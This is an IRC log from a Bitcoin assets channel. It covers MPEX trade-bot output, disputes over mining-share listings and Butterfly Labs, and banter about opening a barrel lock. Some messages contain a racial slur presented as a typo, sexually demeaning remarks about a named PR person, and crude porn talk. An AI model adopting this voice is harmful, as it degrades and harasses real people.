09:22:53 i think he means your bfl post. Dec 12 09:22:55 and i agree Dec 12 09:23:07 hehe Dec 12 09:23:11 Tiggr!*@* added to ignore list. Dec 12 09:25:53 Network: FreeNode Channel: #bitcoin-assets Dec 12 09:25:53 text_hidejoinpart...: ON Dec 12 09:25:59 Network: FreeNode Channel: #bitcoin-assets Dec 12 09:25:59 text_hidejoinpart...: ON Dec 12 09:26:08 :) Dec 12 09:28:20 [MPEX] [S.MPOE] 4321 @ 0.00057117 = 2.468 BTC [-] Dec 12 09:28:21 [MPEX] [S.MPOE] 8879 @ 0.00057107 = 5.0705 BTC [-] Dec 12 09:31:27 so at some point Im going to have to put DMC on bitfunder Dec 12 09:32:04 hehe Dec 12 10:02:43 [MPEX] [S.MPOE] 16301 @ 0.00057107 = 9.309 BTC [-] Dec 12 10:08:37 hey everyone, please read this : http://trilema.com/2012/probably-the-hottest-business-idea-of-the-moment-in-btc/ Dec 12 10:13:47 Thanks for posting that. Dec 12 10:14:03 yee Dec 12 10:22:11 [MPEX] [S.MPOE] 8349 @ 0.00057107 = 4.7679 BTC [-] Dec 12 10:22:13 [MPEX] [S.MPOE] 1330 @ 0.00056915 = 0.757 BTC [-] Dec 12 10:31:08 Diablo-D3: apparently, someone did not like you suggestion. :P Dec 12 10:32:14 [MPEX] [X.ISP5] 1000 @ 0.10179952 = 101.7995 BTC [-] Dec 12 10:45:14 [MPEX] [S.MPOE] 2692 @ 0.00057565 = 1.5496 BTC [+] Dec 12 10:45:15 [MPEX] [S.MPOE] 1371 @ 0.00057579 = 0.7894 BTC [+] Dec 12 10:45:16 [MPEX] [S.MPOE] 6093 @ 0.00057693 = 3.5152 BTC [+] Dec 12 10:45:18 [MPEX] [S.MPOE] 1802 @ 0.00057808 = 1.0417 BTC [+] Dec 12 12:02:12 "Cause they're French. They don't have the technology." Dec 12 12:02:16 ajhahahaha ok Dec 12 12:02:17 lmao Dec 12 12:21:34 they dont Dec 12 12:21:45 they spent all their points on cooking skills instead Dec 12 12:22:06 [03:31:08] Diablo-D3: apparently, someone did not like you suggestion. :P Dec 12 12:22:11 mircea_popescu: the french community frowns upon your shenanigans Dec 12 12:22:11 yeah well. Dec 12 12:22:17 [MPEX] [S.MPOE] 4321 @ 0.00057522 = 2.4855 BTC [-] Dec 12 12:22:17 [MPEX] [S.MPOE] 21579 @ 0.00057517 = 12.4116 BTC [-] Dec 12 12:22:25 Diablo-D3: lol Dec 12 12:22:29 davout lol Dec 12 12:22:47 LOL Dec 12 12:22:56 ALSO WILL SOMEONE BAN NIGGR ALREADY? Dec 12 12:22:57 er Dec 12 12:22:58 tiggr Dec 12 12:23:03 LOL Dec 12 12:23:06 kakobrekla is busy having sex. Dec 12 12:23:09 the letters, they're so close. Dec 12 12:23:37 as long as they're not too close to my bike i'm fine Dec 12 12:23:51 o/~ tiggr stole your bike o/~ Dec 12 12:23:55 lmao Dec 12 12:26:33 hehe Dec 12 12:26:50 Ukto, so burnside is after you now? :D Dec 12 12:27:49 https://www.youtube.com/watch?v=JsMZXl15FRU Dec 12 12:27:52 original <3 Dec 12 12:33:08 [MPEX] [S.MPOE] 4321 @ 0.00057645 = 2.4908 BTC [+] Dec 12 12:33:24 [MPEX] [S.MPOE] 18079 @ 0.00057679 = 10.4278 BTC [+] Dec 12 12:33:52 [MPEX] [S.MPOE] 4321 @ 0.0005765 = 2.4911 BTC [-] Dec 12 12:33:53 [MPEX] [S.MPOE] 3121 @ 0.00057679 = 1.8002 BTC [+] Dec 12 12:33:57 [MPEX] [S.MPOE] 4948 @ 0.00057808 = 2.8603 BTC [+] Dec 12 12:34:01 [MPEX] [S.MPOE] 2350 @ 0.00057815 = 1.3587 BTC [+] Dec 12 12:34:01 [MPEX] [S.MPOE] 2660 @ 0.00057989 = 1.5425 BTC [+] Dec 12 12:37:55 i'm making mousaka Dec 12 12:38:24 mousaka rocks Dec 12 12:38:33 oya. Dec 12 12:38:39 sucks your cooking points aren't that high Dec 12 12:38:57 there are some cooking spoons with +3 cooking for sale on SR Dec 12 12:39:17 i use nude girls with cooking +6 tits. Dec 12 12:39:45 tits only improve cooking skills if they wear nothing but a cooking apron Dec 12 12:40:04 there's a special apron made to go between the tits. Dec 12 12:40:08 they wear it by turn. Dec 12 12:41:02 ok ok you all win Dec 12 12:41:06 and i smell my mousaka. Dec 12 12:41:39 IN MOTHER RUSSIA, WE COOK WITH THIS. Dec 12 12:45:02 TODAY IS 12/12/12, THE END OF THE WORLD IS NIGH Dec 12 12:48:13 word Dec 12 12:49:18 Happy End Of The World Day! Dec 12 12:49:27 jurov : answered your comment Dec 12 12:53:23 [MPEX] [S.MPOE] 4321 @ 0.00057526 = 2.4857 BTC [-] Dec 12 12:53:25 [MPEX] [S.MPOE] 7610 @ 0.00057517 = 4.377 BTC [-] Dec 12 12:53:25 [MPEX] [S.MPOE] 8519 @ 0.00057214 = 4.8741 BTC [-] Dec 12 12:55:36 [MPEX] [S.MPOE] 4321 @ 0.00057959 = 2.5044 BTC [+] Dec 12 12:55:38 [MPEX] [S.MPOE] 8679 @ 0.00057989 = 5.0329 BTC [+] Dec 12 12:56:47 end of the world is 21/12/12 Dec 12 12:58:46 i end to think the world already died. the old one. Dec 12 12:58:58 story checks out Dec 12 12:59:21 sup jurov Dec 12 13:01:16 sup Dec 12 13:10:08 oh.. Dec 12 13:10:08 its about to come... Dec 12 13:10:50 [MPEX] [S.DICE] 750 @ 0.00338611 = 2.5396 BTC [-] Dec 12 13:13:50 [MPEX] [S.MPOE] 4321 @ 0.00057978 = 2.5052 BTC [-] Dec 12 13:13:51 [MPEX] [S.MPOE] 1013 @ 0.00057989 = 0.5874 BTC [+] Dec 12 13:13:53 [MPEX] [S.MPOE] 5366 @ 0.00058078 = 3.1165 BTC [+] Dec 12 13:29:25 [MPEX] [S.MPOE] 10330 @ 0.00058078 = 5.9995 BTC [+] Dec 12 13:31:54 ahhh Dec 12 13:31:54 thar she blows Dec 12 13:31:54 https://bitcointalk.org/index.php?topic=130117.msg1394685#msg1394685 Dec 12 13:32:01 I should probably walk away from teh forums Dec 12 13:32:08 before I manage to piss someone off Dec 12 13:32:12 [MPEX] [S.DICE] 2956 @ 0.00338189 = 9.9969 BTC [-] Dec 12 13:32:24 I think I suck at PR :P Dec 12 13:33:42 read it Dec 12 13:33:44 tell me how bad it is Dec 12 13:34:19 so what if you piss someone off ? Dec 12 13:34:32 What about it? Dec 12 13:34:49 I just get mad about my writing being crap Dec 12 13:34:53 its good ukto, just write less :) Dec 12 13:34:57 pigeons: NO Dec 12 13:35:07 MUST HAVE 100 PAGE RETORTS Dec 12 13:35:11 will cause ppl to want to reply more Dec 12 13:35:12 :P Dec 12 13:35:13 Ukto, i decided to refrain from in-depth analyzing of burnside's stuff and just write about coinbr. I recommend similar approach Dec 12 13:35:21 lesson I learned years ago on forums Dec 12 13:35:29 er Dec 12 13:35:31 to reply LESS Dec 12 13:35:31 even Dec 12 13:35:43 then id/when a troll picks up on it Dec 12 13:35:45 simply ignore THEM Dec 12 13:35:49 and respond to everyone else Dec 12 13:35:49 :P Dec 12 13:36:15 jurov: meh, he posted in bitfunders launch thread Dec 12 13:36:23 I had to offer something back as a thank you. :) Dec 12 13:36:49 [MPEX] [S.MPOE] 2904 @ 0.00058078 = 1.6866 BTC [+] Dec 12 13:36:50 [MPEX] [S.MPOE] 24300 @ 0.00058081 = 14.1137 BTC [+] Dec 12 13:36:52 [MPEX] [S.MPOE] 5546 @ 0.00058093 = 3.2218 BTC [+] Dec 12 13:37:00 as I said, I have nothing aginst him, never ment to make it seem that way. Just responding. Dec 12 13:37:26 not sure if you understood me Dec 12 13:37:35 might not Dec 12 13:37:38 its almost 6am :P Dec 12 13:37:44 and I just wrote some shitty english Dec 12 13:38:06 plainly, analyzing about the belize stuff is just wasting your time Dec 12 13:38:13 ahhh Dec 12 13:38:31 ooh, jurov Dec 12 13:38:35 leave that to mpoe-rp., she's paid to do it Dec 12 13:38:39 did you see, I got an eye roll from someone? :P Dec 12 13:38:57 https://bitcointalk.org/index.php?topic=99497.msg1394411#msg1394411 Dec 12 13:39:23 while I was writing the response, his post kept comming to mind. :P Dec 12 13:40:18 In fact, I now feel the urge to respond to it Dec 12 13:40:27 [MPEX] [S.MPOE] 7254 @ 0.00058093 = 4.2141 BTC [+] Dec 12 13:40:35 [MPEX] [S.MPOE] 3046 @ 0.00058195 = 1.7726 BTC [+] Dec 12 13:42:07 holy crap Dec 12 13:42:11 "At least they're honest  ::)" Dec 12 13:42:16 WHY is a smiley face.. an eyeroll animation1?!? Dec 12 13:42:27 or is that waht 4 eyes is Dec 12 13:46:40 Ukto, that 5:10am reply is really fine, don't see any problem wit it Dec 12 13:54:32 http://www.wired.com/wiredenterprise/2012/12/google-bug/ lol Dec 12 13:59:21 [MPEX] [S.MPOE] 4321 @ 0.00057249 = 2.4737 BTC [-] Dec 12 13:59:22 [MPEX] [S.MPOE] 3679 @ 0.00057214 = 2.1049 BTC [-] Dec 12 14:00:44 [MPEX] [S.MPOE] 4321 @ 0.00057215 = 2.4723 BTC [+] Dec 12 14:00:46 [MPEX] [S.MPOE] 8279 @ 0.00057214 = 4.7367 BTC [-] Dec 12 14:03:00 https://bitcointalk.org/index.php?topic=99497.msg1394714#msg1394714 Dec 12 14:03:01 HANDLES Dec 12 14:03:02 HANDLED Dec 12 14:03:03 even Dec 12 14:05:22 damn it.. now its 6:10am Dec 12 14:16:40 Ukto: your clock is off Dec 12 14:16:45 fix it Dec 12 14:17:21 just syncd... not even 60 seconds Dec 12 14:17:25 where are you seeing that? Dec 12 14:17:49 my irc client timestamps Dec 12 14:17:53 you said 6:10 at 6:05 Dec 12 14:18:00 ass. Dec 12 14:18:00 :P Dec 12 14:18:30 Diablo-D3: did you like my (just edited) post to friedcat ? :P Dec 12 14:18:45 yeah, I saw it before you posted it in here Dec 12 14:29:49 [MPEX] [S.DICE] 2100 @ 0.00337832 = 7.0945 BTC [-] Dec 12 14:29:49 [MPEX] [S.DICE] 1505 @ 0.00332457 = 5.0035 BTC [-] Dec 12 14:43:25 [MPEX] [S.MPOE] 4321 @ 0.00057571 = 2.4876 BTC [+] Dec 12 14:43:26 [MPEX] [S.MPOE] 787 @ 0.00057582 = 0.4532 BTC [+] Dec 12 14:44:14 oh looks like i should submit a claim to DMC Dec 12 14:44:40 0,o Dec 12 14:45:04 wonder how many i had lol Dec 12 14:45:56 didnt you say you were going to give them to me? :P Dec 12 14:46:56 graet: well, theres 320 not claimed yet Dec 12 14:47:29 i *think* i had like 40 Dec 12 14:47:51 do you have a list with addy u can check? Dec 12 14:47:57 yes Dec 12 14:48:36 cool Dec 12 14:48:44 i'll email or something :) Dec 12 14:48:55 just give me the first 3 digits of the address Dec 12 14:48:57 or your email Dec 12 14:49:05 I have both Dec 12 14:49:11 graet@ozco.in Dec 12 14:49:12 I think I saw you Dec 12 14:49:14 lemme check Dec 12 14:49:15 cool Dec 12 14:49:32 ty :) Dec 12 14:49:40 you had 70 shares, and its already in here Dec 12 14:49:47 in here? Dec 12 14:49:50 in the list Dec 12 14:49:55 cool :D Dec 12 15:09:37 he'll eventually throw something at me :P Dec 12 15:09:44 [MPEX] [S.MPOE] 4321 @ 0.00057569 = 2.4876 BTC [-] Dec 12 15:09:45 when he decides to stop staying silent :P Dec 12 15:09:50 [MPEX] [S.MPOE] 1979 @ 0.00057582 = 1.1395 BTC [+] Dec 12 15:11:19 [MPEX] [O.BTCUSD.P140T] 500 @ 0.12483526 = 62.4176 BTC [-] Dec 12 15:11:47 [MPEX] [O.BTCUSD.C120T] 500 @ 0.15545821 = 77.7291 BTC [-] Dec 12 15:12:40 [MPEX] [O.BTCUSD.P130T] 580 @ 0.09155695 = 53.103 BTC [-] Dec 12 15:16:34 [MPEX] [S.MPOE] 4321 @ 0.00057219 = 2.4724 BTC [-] Dec 12 15:16:39 [MPEX] [S.MPOE] 6973 @ 0.00057214 = 3.9895 BTC [-] Dec 12 15:16:39 [MPEX] [S.MPOE] 3106 @ 0.00056915 = 1.7678 BTC [-] Dec 12 15:21:02 [MPEX] [S.MPOE] 4321 @ 0.00056935 = 2.4602 BTC [+] Dec 12 15:21:03 [MPEX] [S.MPOE] 1379 @ 0.00056915 = 0.7849 BTC [-] Dec 12 15:38:41 [MPEX] [O.BTCUSD.P120T] 940 @ 0.06441525 = 60.5503 BTC [-] Dec 12 15:50:56 https://bitcointalk.org/index.php?topic=129844.msg1394663#msg1394663 Dec 12 15:51:01 this is kind of dubious. Dec 12 16:15:44 [MPEX] [S.MPOE] 10037 @ 0.00056942 = 5.7153 BTC [+] Dec 12 16:15:44 [MPEX] [S.MPOE] 2896 @ 0.0005757 = 1.6672 BTC [+] Dec 12 16:19:38 [MPEX] [S.MPOE] 4321 @ 0.0005692 = 2.4595 BTC [-] Dec 12 16:19:38 [MPEX] [S.MPOE] 11785 @ 0.00056915 = 6.7074 BTC [-] Dec 12 16:24:15 [MPEX] [S.MPOE] 6100 @ 0.00056697 = 3.4585 BTC [-] Dec 12 16:27:10 http://drudgereport.com/ Dec 12 16:44:42 [MPEX] [O.BTCUSD.P140T] 661 @ 0.12418574 = 82.0868 BTC [-] Dec 12 16:52:26 0.6188173 BTC paid over 989 shares. Dec 12 16:52:41 [MPEX] [S.MPOE] 29035 @ 0.00056697 = 16.462 BTC [-] Dec 12 16:52:41 this is cute. what's the point of having something that makes 3 btc a month listed as a security ? Dec 12 16:59:19 sounds like gpu mining Dec 12 16:59:27 har har har Dec 12 17:13:20 lol Dec 12 17:19:09 [MPEX] [S.MPOE] 11215 @ 0.00056697 = 6.3586 BTC [-] Dec 12 17:19:10 [MPEX] [S.MPOE] 5285 @ 0.00056473 = 2.9846 BTC [-] Dec 12 17:24:22 [MPEX] [S.MPOE] 16615 @ 0.00056473 = 9.383 BTC [-] Dec 12 17:24:24 [MPEX] [S.MPOE] 11347 @ 0.000564 = 6.3997 BTC [-] Dec 12 17:32:35 [MPEX] [O.BTCUSD.C130T] 90 @ 0.12361654 = 11.1255 BTC [-] Dec 12 17:36:35 [MPEX] [O.BTCUSD.C140T] 10 @ 0.09249376 = 0.9249 BTC [-] Dec 12 17:59:15 mircea_popescu: you know, your drama timeline isnt really correct Dec 12 17:59:28 Remember, I bought back half the shares before the glbse collapse Dec 12 18:14:37 most shit stirring is not 100% correct Dec 12 18:37:58 http://www.youtube.com/watch?v=jFJUz1DO20Q Dec 12 18:38:01 PsychoticBoy: yeah really Dec 12 19:06:06 [MPEX] [S.MPOE] 853 @ 0.000564 = 0.4811 BTC [-] Dec 12 19:06:06 [MPEX] [S.MPOE] 12097 @ 0.00056309 = 6.8117 BTC [-] Dec 12 19:18:26 [MPEX] [S.MPOE] 1425 @ 0.00056439 = 0.8043 BTC [+] Dec 12 19:18:27 [MPEX] [S.MPOE] 2900 @ 0.00056441 = 1.6368 BTC [+] Dec 12 19:18:28 [MPEX] [S.MPOE] 6575 @ 0.00056523 = 3.7164 BTC [+] Dec 12 20:20:27 rdponticelli, wanna buy some real estate? http://www.reddit.com/r/Bitcoin/comments/14odz7/selling_things_for_bitcoins_in_argentina/ Dec 12 20:25:06 looky who's using twatter now: https://twitter.com/pontifex Dec 12 20:26:54 jurov: lol Dec 12 20:27:11 Soon we will be selling our moms for bitcoins Dec 12 20:50:10 jurov: he started tweeting Dec 12 20:51:01 [MPEX] [S.MPOE] 4321 @ 0.000565 = 2.4414 BTC [-] Dec 12 20:51:03 [MPEX] [S.MPOE] 9329 @ 0.00056523 = 5.273 BTC [+] Dec 12 20:53:14 I predict that lulz will ensue Dec 12 20:53:51 there Dec 12 20:53:52 I cleaned out all the bfl crap from the custom hardware forum Dec 12 20:53:57 bfl can have one thread and thats it Dec 12 20:54:03 mod abuse! Dec 12 20:54:16 went from 7 pages to 4. Dec 12 20:54:27 you should delete all posts except for a DMC one Dec 12 20:54:39 dmc isnt in that subforum Dec 12 20:54:39 and sticky it Dec 12 20:54:47 it should be Dec 12 20:58:31 lol Dec 12 21:07:02 http://jcph.am/2012/12/12/problem-solving-barrel-locks/ Dec 12 21:08:22 spam! Dec 12 21:13:05 jcpham: i cracked RSA in a similar way one... just guessed the private key.. :b Dec 12 21:13:11 once Dec 12 21:13:23 hilarity Dec 12 21:13:49 i had several people tell me yesterday that wouldn't work Dec 12 21:14:24 yeah, those types of locks aren't very secure, espesically if you can see the key Dec 12 21:16:52 the long story is this server was in ocean city, nj when the hurricane came through Dec 12 21:17:05 1st floor, 4 blocks from the coast 18 inches above the water line Dec 12 21:17:20 it got shipped to me and the people that shipped it are incompetent Dec 12 21:17:28 end of story Dec 12 21:32:52 GOG.com is giving out DRM free Duke Nukem 3D for free: http://j.mp/DukeNukem3Dfree Dec 12 21:45:01 Anybody watching satoshidice today? Dec 12 21:46:20 Up 11,000 bitcoins profit in the last 24 hours Dec 12 21:51:34 i played that game so much when i was younger Dec 12 21:55:41 [MPEX] [S.MPOE] 4321 @ 0.00056522 = 2.4423 BTC [-] Dec 12 21:55:42 [MPEX] [S.MPOE] 2630 @ 0.00056523 = 1.4866 BTC [+] Dec 12 21:55:44 [MPEX] [S.MPOE] 12041 @ 0.00056729 = 6.8307 BTC [+] Dec 12 21:59:41 [MPEX] [S.MPOE] 4300 @ 0.00056729 = 2.4393 BTC [+] Dec 12 22:04:12 Looks like nefario erroneously sent me some extra BTC. Dec 12 22:04:24 What a comedy of compound errors. Dec 12 22:12:33 [MPEX] [S.MPOE] 1453 @ 0.00056729 = 0.8243 BTC [+] Dec 12 22:12:34 [MPEX] [S.MPOE] 18950 @ 0.00057067 = 10.8142 BTC [+] Dec 12 22:12:36 [MPEX] [S.MPOE] 1247 @ 0.00057082 = 0.7118 BTC [+] Dec 12 22:14:56 https://bitcointalk.org/index.php?topic=80312.560 Dec 12 22:28:39 pigeons: The more time passes since the last time everyone saw pirate, the less chance IMO of him paying back. On the other hand, strictly speaking I would say "before" an event which I think will never happen is an ordering of events that I couldn't really bet on anyway. Dec 12 22:29:11 semantically it seems wrong, but I couldn't tell you how I would phrase it any other way. :-) Dec 12 22:30:33 B0g4r7: if you don't send it back you won't get included on the lists. Of course the fact that nefario hasn't bothered to email the people who've been paid double, and you have to hunt down the payback address, is of course, nothing to worry about Dec 12 22:30:46 So I guess.. the possibilities are: 1) bfl doesn't deliver ever, pirate pays, 2) bfl delivers, but pirate pays first, 3) bfl doesn't deliver ever, pirate never pays, 3) bfl delivers, pirate never pays. Dec 12 22:31:38 4) bfl delivers first, pirate pays Dec 12 22:32:00 they will both deliver. bfl a finger in the ass. pirate a fist. Dec 12 22:32:24 er, 2 x 3) there... Dec 12 22:32:37 i would like to point out that people thought the same thing the first time bfl made weird claims that could only be possible in exceptional circumstances. Dec 12 22:33:18 [MPEX] [S.MPOE] 7800 @ 0.00057082 = 4.4524 BTC [+] Dec 12 22:33:23 markedathome: huh? Dec 12 22:34:00 3) <--- bfl doesn't deliver ever, pirate never pays, 3) <--- bfl delivers, pirate never pays. Dec 12 22:34:58 Yea, I don't care about being on any lists. I had no assets. Dec 12 22:35:17 oh right sorry Dec 12 22:35:28 If he contacts me and asks for it back, I'll send it along. He has my email. Dec 12 22:38:23 Remember, I bought back half the shares before the glbse collapse << 1 btc per ? Dec 12 22:38:39 jurov who's pontifex ? Dec 12 22:39:09 the pope@thevatican Dec 12 22:40:22 though I can't help thinking it is a Douglas Adams H2G2 character Dec 12 22:40:45 most shit stirring is not 100% correct << https://bitcointalk.org/index.php?topic=78638.msg1388615#msg1388615 how about that bit ? Dec 12 22:41:44 o looky! jcpham has a blog! Dec 12 22:42:10 Up 11,000 bitcoins profit in the last 24 hours << is it one of those cases where they only pay the losers cause some bets are stuck or w/e and it seems they made a killing ? Dec 12 22:42:11 oh em gee wordpress accepts bitty bitty bit coins Dec 12 22:42:14 11111111! Dec 12 22:42:38 What a comedy of compound errors. << lol! you mean just now ?! Dec 12 22:42:49 jesus a lot happened in a few hours Dec 12 22:43:50 jcpham wp is quite the scam. a domain costs like 30 usd through them Dec 12 22:44:06 that's ok Dec 12 22:44:15 i pay gandi a few hundred a year Dec 12 22:44:38 o, speaking of nothing in particular, didja see http://trilema.com/2012/probably-the-hottest-business-idea-of-the-moment-in-btc/ ? Dec 12 22:44:43 i did Dec 12 22:44:51 good idea Dec 12 22:45:01 [MPEX] [S.MPOE] 7795 @ 0.00056421 = 4.398 BTC [-] Dec 12 22:45:03 im curious if it gets started or no Dec 12 22:46:00 i know the people needed but prolly cant pay them enough Dec 12 22:46:54 kakobrekla yeah. that guy suggesting formal proof is actually a very smart grad who could prolly do it, but... yeah. Dec 12 22:47:01 unless it gets going it won't be possible tgo pay them Dec 12 22:47:13 jcpham ahahaha! in your place i'd have just drilled the lock. well done. Dec 12 22:50:07 the funny thing is that I don't own that equipment Dec 12 22:50:28 the owners a) didn't try very hard to provide the key b) provided the wrong key after 2 weeks Dec 12 22:51:36 heh Dec 12 22:51:43 barrel key locks aren't THAT good anyway Dec 12 22:52:08 closer to playpretend than to security Dec 12 23:04:19 I'd heard you can just take a ballpoint pen apart and use the plastic body tube to open a barrel lock. Dec 12 23:04:37 i saw it done Dec 12 23:05:12 Hm, interesting idea on the code reviewing service. Dec 12 23:05:46 One problem I see is that, to do a proper review, the reviewer should already possess a thorough understanding of the codebase. Dec 12 23:07:32 why ? Dec 12 23:07:44 Not understanding the history of the codebase, why things were done in the ways they were, the intent behind certain pieces, etc, it's hard to do a decent code review. Dec 12 23:07:45 it seems to me the reverse : foreign eyes are unlikely to make the same mistaken assumptions Dec 12 23:08:01 Well, that's true too. Dec 12 23:09:04 I guess I'm picturing big complex projects that have a lot of big complex subsystems that all interact. Dec 12 23:09:56 ya see, we're not qutioe there yet Dec 12 23:10:09 for all the pretense BTC coding has trouble with race conditions and not keeping things in ramdisks Dec 12 23:10:33 So, like, if you already know what IMediaMessageModel does and is meant to be used for, it's easy to review a piece of code that uses it. Dec 12 23:10:42 obviously the review service could grow with the BTC to the point it's a university in its own, 500+ tenured professors etc. Dec 12 23:11:32 Seems like it could have value though. Especially for smaller codebases. Dec 12 23:11:36 wtf. another mining hashrate company with a pretend backing of 1 single bfl fpga? Dec 12 23:11:45 Or those that are more [properly] modularized. Dec 12 23:12:07 heya Dec 12 23:12:10 how the fuck many people are going to be suckered before they stop buying someone else's mining? Dec 12 23:12:16 anyone know what guruvan is smoking crack on my thread about? Dec 12 23:12:25 There's one born every minute. Dec 12 23:12:27 litecoinglobal "converting" ltc ot "ltcl" or something Dec 12 23:12:52 LTC Lite. Won't full you up, never slows you down. Dec 12 23:12:58 lol Dec 12 23:13:01 "Check the home page on litecoinglobal.com - it clearly states that you convert LTC to LITS to use in the securities exchange game available on the site." Dec 12 23:13:04 ukto link Dec 12 23:13:05 I see nothing on that site... Dec 12 23:13:07 about convert anything Dec 12 23:13:11 wtf. another mining hashrate company with a pretend backing of 1 single bfl fpga? << those won't go away lol. Dec 12 23:13:30 i should've made a mining asset Dec 12 23:13:38 at least my rigs have been running this whole time Dec 12 23:13:40 https://bitcointalk.org/index.php?topic=130117.msg1394969#msg1394969 Dec 12 23:13:51 $2500 invested?! how the hell do they ever expect to make their money back on just one single?! Dec 12 23:13:52 jcpham in the end, it doesn't seem worth it. Dec 12 23:13:54 free capital for mining! Dec 12 23:14:08 the biggest winner aka gigavps is mired down in his current legal crap and i doubt overall he has a net + to show for it Dec 12 23:14:20 and all the rest of the losers made less than what their time's worth Dec 12 23:14:31 such as PsychoticBoy's amuysing 3 btc a month "asset". Dec 12 23:14:37 his current legal crap? Dec 12 23:14:53 i could buy 3btc/day otc and call it an asset Dec 12 23:15:06 mircea_popescu: to each their own, right? :P Dec 12 23:15:09 midnightmagic isn't he stuck paying a lawyer to review documents ? Dec 12 23:15:17 Ukto sure. Dec 12 23:15:38 mircea_popescu: I don't know. I didn't read anything about that on any of the channels I'm in. Dec 12 23:15:57 o, well you're slightly behind. Dec 12 23:16:05 ukto litecoinglobal has soooo much text to read Dec 12 23:16:12 I guess so! Where should I be looking for this then? :-) Dec 12 23:16:13 I CTRL+F for LITS and found nana Dec 12 23:16:18 *nada Dec 12 23:16:26 giga ended up trying to reconstruct the lists nefario gave ghim and verify them through having people submit info (ids, taxids, affidavits) Dec 12 23:16:26 lol giga Dec 12 23:16:31 all this going to a lawyer in florida Dec 12 23:16:41 He's going ahead with the AML BS that Nef gave up on? Dec 12 23:16:43 whoah Dec 12 23:16:47 right ? Dec 12 23:16:56 no way that's not in five figures. Dec 12 23:17:12 affidavits and taxids?! Dec 12 23:17:14 yeah Dec 12 23:17:19 Is there a thread about that somewhere? Dec 12 23:17:26 not to be critical of anyone or thing (assets) Dec 12 23:17:32 which caused people to thow a fit, esp since many are not in the us and it can cost a good chunk in the eu Dec 12 23:17:36 apostiles and bs Dec 12 23:17:41 read his own thread in btctalk Dec 12 23:17:42 i haven't attempted anything like this because i do not have the time for it Dec 12 23:17:47 jcpham: he said "it clearly states tthat you convert LTC to LITS" ... find says 'convert' is not on the page, neitehr is 'LITS' Dec 12 23:17:51 i'm not serious enough about this economy for it Dec 12 23:18:04 that's a pity jcpham Dec 12 23:18:06 so I dont know what hes smoking Dec 12 23:18:15 at least i realize it though Dec 12 23:18:22 and burnside even ignored him Dec 12 23:18:25 i would need tiome to devote to managing an asset Dec 12 23:18:35 sounds like a job tbh Dec 12 23:18:42 it is. Dec 12 23:18:52 maybe the part-timers should stop Dec 12 23:19:03 in general the half-assers should stop Dec 12 23:19:10 that's my point Dec 12 23:19:15 at least i know i'm half-ass Dec 12 23:19:16 not just btc. they should stop everything, fucking, going to school, ghoing to work, everything Dec 12 23:19:22 such as PsychoticBoy's amuysing 3 btc a month "asset".<< it is only for fun not that I need to earn anything with it, I have a day time job Dec 12 23:19:43 that's kinda what we were discussing Dec 12 23:19:54 but i'm more interested in your response to deprived's post if any ? Dec 12 23:20:03 so PsychoticBoy admits his assets is a game Dec 12 23:20:26 not to make light of it Dec 12 23:20:39 its all for fun Dec 12 23:20:43 i just wonder how many more assets were games Dec 12 23:21:02 I think they have to be, to be more legal. Dec 12 23:21:08 It is also no lie, you get what I promise Dec 12 23:21:10 probably most/all on glbse. Dec 12 23:21:11 mircea_popescu: Ah, I see. You're directly involved via an MPOE passthrough? Are you running the passthrough or just the exchange on which the passthrough operates? Dec 12 23:21:17 there's a reason people keep whining about "easy to use" Dec 12 23:21:24 i'm not even saying it is a bad thing Dec 12 23:21:24 .. uh.. is it MPOE or MPEX these days? Dec 12 23:21:45 midnightmagic the passthrough held some shares, it's been dissolved meanwhile. also look in the forum for discussion, it was a little dramatique Dec 12 23:21:49 not quite to the level, but some Dec 12 23:21:55 also, tell your PR lady to ransom another boobs pic. :) Dec 12 23:21:57 it's both. mpoe is the options trader. Dec 12 23:21:59 but I have to leave you guys, I have to work, later Dec 12 23:22:07 oh ok. Dec 12 23:22:25 "tits mcghee" aka mpoe-pr needs to show more boob Dec 12 23:22:38 maybe some side-boob Dec 12 23:22:39 lmao Dec 12 23:22:45 something tasteful Dec 12 23:22:51 classy Dec 12 23:22:52 PsychoticBoy: You implied that there would be additional mining devices by using the plural "(`s)" in the original IPO. Dec 12 23:23:05 need i remind everyone the forum failed to delivered when she offered to show pics ? Dec 12 23:23:23 i missed it Dec 12 23:23:24 mircea_popescu: Double down! :-) Wait how much were they ransom'd for? Dec 12 23:23:31 yeah for real link me Dec 12 23:23:54 did she want 100BTC Dec 12 23:24:00 i don't even remember Dec 12 23:24:12 it was early on, back when the howler hole thought it's too cool for her or something Dec 12 23:24:25 pornhub/brazzers guy got arrested for tax evasion yesterday Dec 12 23:24:27 iirc Dec 12 23:24:29 Waht's a howler-hole? Dec 12 23:24:30 noway ?! Dec 12 23:24:35 true story Dec 12 23:24:37 midnightmagic a place howlers gather. Dec 12 23:24:58 aw, boo. some of brazzer's porn was really good. Dec 12 23:25:08 Amy Reid and Gina Lynn fuck arrested guy FFM Dec 12 23:25:14 2nd hit for that search. true story too. Dec 12 23:25:27 midnightmagic i routinely gave them as examples of really shitty porn lol Dec 12 23:25:40 http://www.huffingtonpost.com/2012/12/11/fabian-thylman-arrested-pornhub-youporn-taxes_n_2276381.html Dec 12 23:25:51 mircea_popescu: In the usual case. But rarely.. "some" of their stuff was fucking gold. Dec 12 23:25:55 pun intended. Dec 12 23:25:58 need to get in touch with him, tell him about bitcoin Dec 12 23:25:59 (s) says nothing, Dec 12 23:26:08 like what ?! Dec 12 23:26:19 so I implied nothing, I never promised anything Dec 12 23:27:05 "they're estimating his income in the hundred million range. personally I think they grossly underestimating it." Dec 12 23:27:14 lmao idiot people. he's not making 100mn. Dec 12 23:27:17 theymos already said I wont get a Scammer Tag so Jeuk suck my ballz Dec 12 23:27:34 Jurek Dec 12 23:27:35 * Dec 12 23:27:48 google "just how big is youporn" Dec 12 23:28:40 dood, youtube is bigger. does it make money nao ? Dec 12 23:28:40 ;;seen smickles Dec 12 23:28:40 smickles was last seen in #bitcoin-assets 17 hours, 55 minutes, and 33 seconds ago: :o Dec 12 23:29:24 well obviously you give away the free porn to drive traffic to the paysites Dec 12 23:29:28 yaya Dec 12 23:29:32 but i dunno why anyone would pay for porn Dec 12 23:29:34 but now I really have to go, later dudes Dec 12 23:29:42 paysites are making jack shit. 100mn was possible in the 90s not in 2012 Dec 12 23:30:09 i can't see anyone spending 29.95/month for porn vids anymore Dec 12 23:30:20 they'd need to be real twisted Dec 12 23:30:30 or just not care about 30 bucks Dec 12 23:30:41 i spend 20-30 dollars on pretty much any game i try on general principle. Dec 12 23:31:00 i'll spend 20-30 bucks on just about anything Dec 12 23:31:04 except porn it seems Dec 12 23:36:26 nice. Course he quit. Dec 12 23:36:58 who ? Dec 12 23:37:51 Psychoboy Dec 